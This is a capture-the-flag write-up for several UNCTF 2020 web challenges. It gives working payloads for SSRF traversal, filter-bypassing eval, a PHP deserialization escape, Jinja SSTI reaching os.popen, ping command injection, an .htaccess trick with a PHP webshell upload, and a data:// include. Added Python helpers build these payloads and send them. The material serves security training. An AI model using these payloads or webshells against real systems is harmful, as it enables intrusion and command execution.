Date: 7 to 14 November 2020
Source: UNCTF
easy_ssrf
<?php
echo'<center><strong>welc0me to 2020UNCTF!!</strong></center>';
highlight_file(__FILE__);
$url = $_GET['url'];
if(preg_match('/unctf\.com/',$url)){
if(!preg_match('/php|file|zip|bzip|zlib|base|data/i',$url)){
$url=file_get_contents($url);
echo($url);
} else {
echo('error!!');
}
}else{
echo("error");
}
?>
payload:
?url=unctf.com%../../../../../flag
Why it works: the allow-list check only requires that `unctf.com` appears somewhere in the string, and the deny-list only blocks wrapper names (php, file, zip, data, ...), so a plain relative filesystem path passes both. file_get_contents() then resolves the path relative to the web root: `unctf.com%..` is a filler directory component that the first `../` cancels (PHP strips `..` components lexically when it expands the path, so the filler does not need to exist), and the remaining `../` climb to the root, giving /flag. Extra `../` beyond the root are harmless.
Hint: URL syntax, e.g. how `%` and `#` are used.
babyeval
<?php
// the flag is in flag.php
if(isset($_GET['a'])){
if(preg_match('/\(.*\)/', $_GET['a']))
die('hacker!!!');
ob_start(function($data){
if (strpos($data, 'flag') !== false)
return 'ByeBye hacker';
return false;
});
eval($_GET['a']);
} else {
highlight_file(__FILE__);
}
?>
payload:
?a=echo `cat flag.php | base64`
payload2:
?a=include 'php://filter/read=convert.base64-encode/resource=./flag.php'
Why these work: the regex /\(.*\)/ rejects any input with an opening parenthesis that is later followed by a closing one, so ordinary function calls are out. The backtick operator (PHP's shell-exec shorthand) and the include language construct both run without parentheses. The ob_start() callback replaces the whole output buffer with 'ByeBye hacker' whenever it contains the substring 'flag', which is why both payloads base64-encode the file on the way out; decode the response locally.
easyunserialize
<?php
error_reporting(0);
highlight_file(__FILE__);
class a
{
public $uname;
public $password;
public function __construct($uname,$password)
{
$this->uname=$uname;
$this->password=$password;
}
public function __wakeup()
{
if($this->password==='easy')
{
include('flag.php');
echo $flag;
}
else
{
echo 'wrong password';
}
}
}
function filter($string){
return str_replace('challenge','easychallenge',$string);
}
$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>
payload:
?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}111
Why it works: filter() runs on the already-serialized string and turns every 'challenge' (9 bytes) into 'easychallenge' (13 bytes) without touching the declared string length, so each match gives 4 bytes of slack. The injected tail `";s:8:"password";s:4:"easy";}` is 29 bytes, so 8 copies of 'challenge' (32 bytes of slack) plus 3 padding characters ('111') make the declared length of uname cover exactly the eight 'easychallenge' strings. unserialize() then reads the tail as a real password property of 'easy' and closes the object, ignoring the original `;s:8:"password";i:1;}` that follows; __wakeup() sees password === 'easy' and prints the flag.
Hint: serialized-string escape (the declared length no longer matches the data).
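An added example, not from the writeup, that computes the padding for any replacement pair and injected tail, then checks the result with a small reader for the PHP serialization format (objects, strings, ints and bools only; PHP lengths are byte counts, so the mirror is exact for ASCII input). php_serialize_a() reproduces what serialize(new a($uname, 1)) emits for a string uname.

```python
def php_serialize_a(uname: str, password: int = 1) -> str:
    """Mirror of serialize(new a($uname, $password)) for a string uname and an
    int password; PHP stores the byte length and does not escape quotes."""
    return 'O:1:"a":2:{s:5:"uname";s:%d:"%s";s:8:"password";i:%d;}' % (
        len(uname.encode()), uname, password)


def challenge_filter(serialized: str) -> str:
    return serialized.replace("challenge", "easychallenge")


def build_escape(tail: str, needle: str = "challenge", replacement: str = "easychallenge") -> str:
    """Choose the number of needles so that the slack they gain exactly covers
    the injected tail; extra characters pad the declared length."""
    gain = len(replacement) - len(needle)   # 4 bytes per match here
    copies = -(-len(tail) // gain)          # ceil(len(tail) / gain)
    padding = copies * gain - len(tail)
    return needle * copies + tail + "1" * padding


def php_unserialize(data: str):
    """Minimal reader for the O/s/i/b types used on this page. Like PHP, it
    returns the first value and ignores whatever follows it."""
    value, _ = _parse(data, 0)
    return value


def _parse(s: str, i: int):
    t = s[i]
    if t in "ib":
        end = s.index(";", i)
        raw = s[i + 2:end]
        return (int(raw) if t == "i" else raw == "1"), end + 1
    if t == "s":
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        start = colon + 2                       # skip :"
        if s[start + n:start + n + 2] != '";':
            raise ValueError('declared length %d does not end at "; (offset %d)' % (n, start + n))
        return s[start:start + n], start + n + 2
    if t == "O":
        colon = s.index(":", i + 2)
        name_len = int(s[i + 2:colon])
        name = s[colon + 2:colon + 2 + name_len]
        pos = colon + 2 + name_len + 2          # skip ":
        brace = s.index(":", pos)
        count = int(s[pos:brace])
        pos = brace + 2                         # skip :{
        props = {}
        for _ in range(count):
            key, pos = _parse(s, pos)
            value, pos = _parse(s, pos)
            props[key] = value
        if s[pos] != "}":
            raise ValueError("object not closed at offset %d" % pos)
        return (name, props), pos + 1
    raise ValueError("unsupported type %r at offset %d" % (t, i))
```

Running the same payload through php_unserialize() with and without challenge_filter() shows the point of the technique: unfiltered, the injected tail is just part of the uname string; filtered, the lengthened uname makes the tail parse as the password property.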
ezphp
<?php
show_source(__FILE__);
$username = "admin";
$password = "password";
include("flag.php");
$data = isset($_POST['data'])? $_POST['data']: "" ;
$data_unserialize = unserialize($data);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
echo $flag;
}else{
echo "username or password error!";
}
payload:
POST: data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
Why it works: the comparison uses == and the values come straight from unserialize(), so the attacker chooses their types. When one operand is a boolean, PHP converts the other to boolean before comparing, and any non-empty string other than "0" is true, so true == "admin" and true == "password" both hold. This works on PHP 7 and PHP 8 alike; the older trick of sending i:0 (0 == "admin") only works before PHP 8.
Hint: PHP loose (==) comparison.
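An added model of the relevant part of PHP's == rules (bool against anything, int against string in both the PHP 7 and PHP 8 variants), not code from the writeup; it is there to show why b:1 is the version-independent choice, and is not a complete implementation of PHP comparison.

```python
import re

_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
_LEADING_INT = re.compile(r"^\s*[+-]?\d+")


def php_bool(v) -> bool:
    """PHP truthiness for the types unserialize() can hand to the challenge."""
    if isinstance(v, bool):
        return v
    if isinstance(v, (int, float)):
        return v != 0
    if isinstance(v, str):
        return v not in ("", "0")
    if v is None:
        return False
    return len(v) != 0          # arrays: non-empty is true


def php_loose_eq(a, b, php8: bool = True) -> bool:
    """Model of == for bool/int/string operands."""
    if isinstance(a, bool) or isinstance(b, bool):
        return php_bool(a) == php_bool(b)       # same rule in PHP 7 and PHP 8
    if isinstance(a, str) and isinstance(b, str):
        if _NUMERIC.match(a) and _NUMERIC.match(b):
            return float(a) == float(b)         # "1e1" == "10"
        return a == b
    if isinstance(a, int) and isinstance(b, str):
        a, b = b, a                             # normalise to (str, int)
    if isinstance(a, str) and isinstance(b, int):
        if _NUMERIC.match(a):
            return float(a) == b
        if php8:
            return a == str(b)                  # PHP 8: the int is cast to string
        m = _LEADING_INT.match(a)               # PHP 7: the string is cast to int
        return (int(m.group()) if m else 0) == b
    return a == b


def ezphp_accepts(data: dict, php8: bool = True) -> bool:
    """The challenge's check on an unserialized array."""
    return (php_loose_eq(data["username"], "admin", php8)
            and php_loose_eq(data["password"], "password", php8))
```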
easyflask
The challenge has login and registration. Register admin/admin, go back to the index page, and it reveals a secret_route_you_do_not_know page.
That page asks you to guess via ?guess=
There is SSTI here (before finding it I spent a long time brute-forcing the SECRET_KEY).
The SSTI filter blocks:
[ ] ' " _
The blocked underscore is bypassed with |attr(request.args.cla),
with the attribute name passed as a GET parameter.
The blocked single and double quotes are bypassed the same way: request.args.a
supplies the string from a GET parameter.
The blocked square brackets [] are bypassed with .pop(index) or __getitem__.
Pay close attention to how Python accesses these subclasses, attributes and dict keys, or it is easy to get wrong (I spent ages on this). The subclass index (166 here) depends on the target's Python version and loaded modules; enumerate object.__subclasses__() and find warnings.catch_warnings by name rather than assuming the number.
The chain used (warnings.catch_warnings is index 166 of object.__subclasses__() on the target):
().__class__.__bases__[0].__subclasses__()[166].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag.txt').read()")
payload:
{{(((()|attr(request.args.cla)|attr(request.args.bas)|list).pop(0))|attr(request.args.sub)()).pop(166)|attr(request.args.ini)|attr(request.args.glo)|attr(request.args.geti)(request.args.bui)|attr(request.args.geti)(request.args.ii)(request.args.hh)}}&cla=__class__&bas=__bases__&sub=__subclasses__&ini=__init__&glo=__globals__&bui=__builtins__&hh=__import__('os').popen('cat flag.txt').read()&ii=eval&geti=__getitem__
A few articles (I actually went through many more):
https://www.mi1k7ea.com/2019/05/31/Python沙箱逃逸小结/
https://www.secpulse.com/archives/115367.html
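An added helper, not part of the writeup, that finds the gadget index on the local interpreter, walks the same chain as the payload outside Jinja to confirm it reaches eval, and builds the template plus query string with every attribute name supplied through request.args. The parameter names (cla, bas, sub, ini, glo, bui, geti, ii, hh) and the guess parameter are the ones the payload above uses.

```python
import warnings  # make sure warnings.catch_warnings exists as a subclass of object
from urllib.parse import urlencode

BANNED = set("[]'\"_")   # characters the challenge rejects inside the template


def find_gadget(name: str = "catch_warnings") -> int:
    """Index of the gadget class in object.__subclasses__() on this interpreter.
    The number (166 on the challenge box) changes with the Python version and
    the modules loaded, so look it up instead of hard-coding it."""
    for index, cls in enumerate(object.__subclasses__()):
        if cls.__name__ == name:
            return index
    raise LookupError(name)


def gadget_eval(index: int):
    """Walk the chain the payload uses: class -> __init__ -> __globals__ ->
    __builtins__ -> eval, and hand back the eval function."""
    builtins = object.__subclasses__()[index].__init__.__globals__["__builtins__"]
    # __builtins__ is the builtins dict in an imported module; fall back to the
    # module object for interpreters that store it that way.
    return builtins["eval"] if isinstance(builtins, dict) else builtins.eval


def build_payload(index: int, command: str = "cat flag.txt"):
    """Template with no [, ], quotes or underscores; every dunder name and the
    eval argument come from the query string. Returns (template, query)."""
    template = (
        "{{(((()|attr(request.args.cla)|attr(request.args.bas)|list).pop(0))"
        "|attr(request.args.sub)()).pop(%d)"
        "|attr(request.args.ini)|attr(request.args.glo)"
        "|attr(request.args.geti)(request.args.bui)"
        "|attr(request.args.geti)(request.args.ii)(request.args.hh)}}" % index
    )
    params = {
        "guess": template,
        "cla": "__class__", "bas": "__bases__", "sub": "__subclasses__",
        "ini": "__init__", "glo": "__globals__", "bui": "__builtins__",
        "geti": "__getitem__", "ii": "eval",
        "hh": "__import__('os').popen(%r).read()" % command,
    }
    return template, urlencode(params)


def template_is_clean(template: str) -> bool:
    return not (set(template) & BANNED)
```

The quotes in the hh parameter never reach the template engine: the filter only sees the guess value, and request.args.hh is read at render time as an ordinary string.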
UN’s_online_tools
It opens on a classic online tool whose function is to ping a given IP.
The first step is always to fuzz which characters are banned. Testing with Burp, the following are banned:
$
&
*
{
]
;
'
>
space
Next, run ls through a pipe: |ls
which echoes back index.php.
Then bypass the space with %09 (a tab); cat is filtered, so break the word with a backslash.
Read the source: |ca\t%09index.php
<!doctype html>
<html>
<head>
<meta charset='utf-8'>
<title>Login</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="box">
<h2>PING</h2>
<h4>Other features under development</h4>
<form action="./index.php" method="get">
<div class="inputBox">
<input type="text" name="url" required="">
<label>Url</label>
</div>
<input type="submit" name="GO" value="GO">
</form>
<br>
<?php
if (isset($_GET['url'])){
$ip=$_GET['url'];
if(preg_match("/(;|'| |>|]|&| |\\$|\\|rev|more|tailf|head|nl|tail|tac|cat|rm|cp|mv|\*|\{)/i", $ip)){
die("<strong><center>Illegal character</center></strong>");
}
if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("<strong><center>Illegal character</center></strong>");
}
$a = shell_exec("ping -c 4 ".$ip);
echo($a);
}else{
echo "<script>alert('Welcome to UN`s online tools. If the challenge is not to your liking, feel free to turn left on your way out')</script>";
}
?>
</div>
</body>
</html>
Now the filtering is clear. As written, the first pattern only bans the pipe as part of the literal sequence `|rev` (the `\|` escape sits directly in front of rev), the backslash is not listed at all, and neither is the tab, which is why `|ls`, `%09` and `ca\t` all get through. The second pattern bans any input containing f, l, a, g in that order, so spell the file name with the shell's `?` wildcard instead.
payload:
|ca\t%09/f???
The response shows the flag.
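An added example, not from the writeup, that transcribes the two patterns from index.php, shows how the shell tokenises the injected text (shlex follows the POSIX rules for backslashes and whitespace), and gives the hardened form: validate the target as an IP literal and run ping with an argv list instead of shell_exec(). Accepting only IP literals (no hostnames) is a design choice of this example.

```python
import ipaddress
import re
import shlex
import subprocess

# The two preg_match() patterns from index.php, transcribed as shown on the
# page: the pipe only appears as the literal sequence '|rev' and the backslash
# is not listed.
BLACKLIST = re.compile(
    r"(;|'| |>|]|&| |\$|\|rev|more|tailf|head|nl|tail|tac|cat|rm|cp|mv|\*|\{)", re.I)
FLAG_PATTERN = re.compile(r".*f.*l.*a.*g.*")

# The page's payload after %09 has been decoded: |ca\t<TAB>/f???
PAYLOAD = "|ca\\t\t/f???"


def challenge_blocks(url: str) -> bool:
    """True when the challenge would answer 'Illegal character'."""
    return bool(BLACKLIST.search(url) or FLAG_PATTERN.search(url))


def injected_words(url: str):
    """How sh tokenises the text after the pipe: a backslash before a letter is
    dropped and a tab separates words, so 'ca\\t<TAB>/f???' becomes ['cat', '/f???']."""
    return shlex.split(url.lstrip("|"))


def safe_ping_argv(target: str):
    """Hardened form: accept only an IP literal and never involve a shell."""
    addr = ipaddress.ip_address(target)     # ValueError for anything else
    return ["ping", "-c", "4", str(addr)]


def is_valid_target(target: str) -> bool:
    try:
        safe_ping_argv(target)
        return True
    except ValueError:
        return False


def run_ping(target: str) -> str:
    """Runs ping without a shell; the target can only ever be one argv entry."""
    return subprocess.run(safe_ping_argv(target), capture_output=True, text=True).stdout
```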
easy_upload
File upload. The filename is filtered so that only image files can be uploaded, but the uploaded file keeps its name, so think .htaccess.
Upload .htaccess:
POST /index.php HTTP/1.1
Host: 164003d7-9b83-484e-af2a-c400e62a742e.node3.hackingfor.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3533994738563832533554341631
Content-Length: 378
Origin: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun
Connection: close
Referer: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun/
Upgrade-Insecure-Requests: 1
-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="fileUpload"; filename=".htaccess"
Content-Type: image/jpeg
SetHandler application/x-httpd-p\
hp
-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="upload"
submit
-----------------------------3533994738563832533554341631--
The file contents are filtered too; the error message lists the banned substrings: perl|pyth|ph|auto|curl|base|\|>|rm|ryby|openssl|war|lua|msf|xter|telnet in contents!
The .htaccess above dodges `ph` with Apache's backslash line continuation: `application/x-httpd-p\` followed by `hp` on the next line is read as `application/x-httpd-php`, so every file in the directory is handed to the PHP handler (this needs AllowOverride to permit FileInfo directives). The shell itself avoids `ph` by using the short echo tag `<?=`, which PHP accepts regardless of short_open_tag:
POST /index.php HTTP/1.1
Host: 164003d7-9b83-484e-af2a-c400e62a742e.node3.hackingfor.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3533994738563832533554341631
Content-Length: 359
Origin: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun
Connection: close
Referer: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun/
Upgrade-Insecure-Requests: 1
-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="fileUpload"; filename="a.jpg"
Content-Type: image/jpeg
<?=system("cat /flag");
-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="upload"
submit
-----------------------------3533994738563832533554341631--
Then request a.jpg and the flag is printed.
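An added example, not part of the writeup, that checks the two uploads against the content filter the challenge reported and builds the multipart body shown in the requests above. Case-insensitive matching is an assumption; the field names fileUpload and upload and the image/jpeg content type are taken from the requests on this page. The upload() call is a network action and is not exercised offline.

```python
import re
import uuid
import urllib.request

# The banned substrings listed by the challenge's error message, transcribed
# as shown; case-insensitive matching is assumed.
CONTENT_FILTER = re.compile(
    r"perl|pyth|ph|auto|curl|base|\|>|rm|ryby|openssl|war|lua|msf|xter|telnet", re.I)

# Apache joins a line ending in a backslash with the next one, so the handler
# is read as application/x-httpd-php although 'ph' never appears in the file.
HTACCESS = "SetHandler application/x-httpd-p\\\nhp\n"

# Short echo tag: runs as PHP once the handler applies, with no 'ph' in the file.
WEBSHELL = '<?=system("cat /flag");'


def filter_hits(content: str):
    """Substrings the content filter would complain about (empty list = accepted)."""
    return [m.group(0) for m in CONTENT_FILTER.finditer(content)]


def multipart_upload(field: str, filename: str, content: str, boundary: str = None):
    """Build the multipart/form-data body the page's requests show: the file part
    declared as image/jpeg, plus the 'upload' submit field. Returns (content-type, body)."""
    boundary = boundary or uuid.uuid4().hex
    body = (
        "--{b}\r\n"
        'Content-Disposition: form-data; name="{f}"; filename="{n}"\r\n'
        "Content-Type: image/jpeg\r\n\r\n{c}\r\n"
        "--{b}\r\n"
        'Content-Disposition: form-data; name="upload"\r\n\r\nsubmit\r\n'
        "--{b}--\r\n"
    ).format(b=boundary, f=field, n=filename, c=content)
    return "multipart/form-data; boundary=" + boundary, body.encode()


def upload(url: str, filename: str, content: str) -> bytes:
    """POST one file to the upload endpoint, refusing content the filter would catch."""
    hits = filter_hits(content)
    if hits:
        raise ValueError("content filter would reject %r" % hits)
    ctype, body = multipart_upload("fileUpload", filename, content)
    req = urllib.request.Request(url, data=body, headers={"Content-Type": ctype})
    with urllib.request.urlopen(req) as resp:
        return resp.read()
```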
ezfind
I solved this one in an unintended way as well....
When I could not get anywhere I opened Burp, loaded every fuzz payload I had, and one of them worked... I was dumbfounded.
The brute-forced payload ends in %00, so the short form of the payload is:
name=%00
Reproducing after the contest: when given an array or a string containing %00, is_file() returns NULL (PHP 7 behaviour; PHP 8 throws instead, and from 8.1 a null byte simply gives false).
Truly the best language!
L0vephp
I did not solve this one during the contest because I could not find the entry point; afterwards star gave the hint: ?action
First, use a filter wrapper on the include to read flag.php:
php://filter/read=convert.quoted-printable-encode/resource=flag.php
flag.php contains a fake flag and a hint pointing at 1nD3x.php, whose source is:
<?php
error_reporting(0);
show_source(__FILE__);
$code=$_REQUEST['code'];
$_=array('@','\~','\^','\&','\?','\<','\>','\*','\`','\+','\-','\'','\"','\\\\','\/');
$__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open');
$blacklist1 = array_merge($_);
$blacklist2 = array_merge($__);
if (strlen($code)>16){
die('Too long');
}
foreach ($blacklist1 as $blacklisted) {
if (preg_match ('/' . $blacklisted . '/m', $code)) {
die('WTF???');
}
}
foreach ($blacklist2 as $blackitem) {
if (preg_match ('/' . $blackitem . '/im', $code)) {
die('Sry,try again');
}
}
@eval($code);
?>
So many symbols and all the usual command-execution functions are filtered, and the input is capped at 16 characters. A simple payload still shows the phpinfo() page:
?code=${phpinfo()};
It reveals an important setting:
allow_url_fopen On On
allow_url_include On On
So go through file inclusion to run commands: include is a language construct rather than a blacklisted function, include$_GET[1]; is exactly 16 characters, and the real payload lives in a second parameter that nothing inspects. payload:
?code=include$_GET[1];&1=data://text/plain,<?php%20system("cat%20/flag_mdnrvvldb");?>
The flag file had been renamed, which is why it could not be found at first; ls / first to locate it.
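An added example, not from the writeup, that reproduces the three checks in 1nD3x.php so a candidate can be tested offline, and builds the two-stage query: a 16-byte include of an unfiltered parameter, and a base64 data:// URL for the second stage (the plain text/plain form on the page works too; base64 only keeps the PHP source out of the query string verbatim). It requires allow_url_include=On on the target, which phpinfo() showed.

```python
import base64
from urllib.parse import urlencode

# 1nD3x.php's two blacklists; each entry is a plain substring here because the
# PHP patterns contain no metacharacters beyond the escapes.
BANNED_SYMBOLS = list("@~^&?<>*`+-'\"\\/")
BANNED_FUNCTIONS = ["eval", "system", "exec", "shell_exec", "assert", "passthru",
                    "array_map", "ob_start", "create_function", "call_user_func",
                    "call_user_func_array", "array_filter", "proc_open"]
MAX_LEN = 16


def rejection(code: str):
    """The message 1nD3x.php would die with, or None if the code reaches eval()."""
    if len(code) > MAX_LEN:
        return "Too long"
    if any(sym in code for sym in BANNED_SYMBOLS):
        return "WTF???"
    if any(fn in code.lower() for fn in BANNED_FUNCTIONS):
        return "Sry,try again"
    return None


STAGE1 = "include$_GET[1];"   # exactly 16 bytes, no banned symbol, no banned function name


def data_wrapper(php_source: str) -> str:
    """data:// URL for the second stage; needs allow_url_include=On."""
    return "data://text/plain;base64," + base64.b64encode(php_source.encode()).decode()


def build_query(command: str = "ls /") -> str:
    """Full query string: the 16-byte first stage plus the unfiltered parameter 1."""
    stage2 = '<?php system("%s");?>' % command
    return urlencode({"code": STAGE1, "1": data_wrapper(stage2)})


def decode_data_wrapper(url: str) -> str:
    """What PHP's data wrapper hands to include: the decoded payload."""
    return base64.b64decode(url.split(",", 1)[1]).decode()
```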